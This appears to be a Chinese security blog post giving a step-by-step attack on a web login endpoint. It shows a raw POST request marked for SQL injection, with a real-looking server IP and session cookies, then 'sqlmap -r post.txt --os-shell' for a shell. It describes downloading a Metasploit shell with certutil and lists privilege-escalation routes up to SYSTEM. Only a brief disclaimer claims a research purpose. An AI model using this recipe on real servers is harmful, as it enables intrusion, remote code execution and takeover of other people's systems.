直接上图
请求包
POST /Login/ValidateLogin HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 30
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://111.73.45.27:8001
Referer: http://111.73.45.27:8001/Login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599407883; RYQIPAI=RYCacheKey=1&RYCacheKey_ETS=2020-09-07+00%3a28%3a17&VS=07a6f8746a60ecc3; ASP.NET_SessionId=udnrj5bxpuchvrf4fs4oute3; BT_PANEL_6=3a8e87d5-ad8a-4db2-9e57-c3a1684991e0._Tklm_sxRP6Gk0jcgXfEFwQVt9Y; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599429027
Connection: close
userName=123*&password=321
使用方法
sqlmap -r post.txt --os-shell
即可获取交互shell,然后我们用win自带的certutil.exe下载msf生成的shell即可提权。
提权小思路
-
使用MSF的UAC提权模块进行提权。
-
使用“哥斯拉”菜刀工具的小模块进行提权加用户组。
-
使用MSF工具的CVE漏洞模块进行提权。
注:经测试有些站点可直接拿system权限
请注意时间
Hi
扫二维码|关注我们
云闲|剑青
侠骨|初心
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论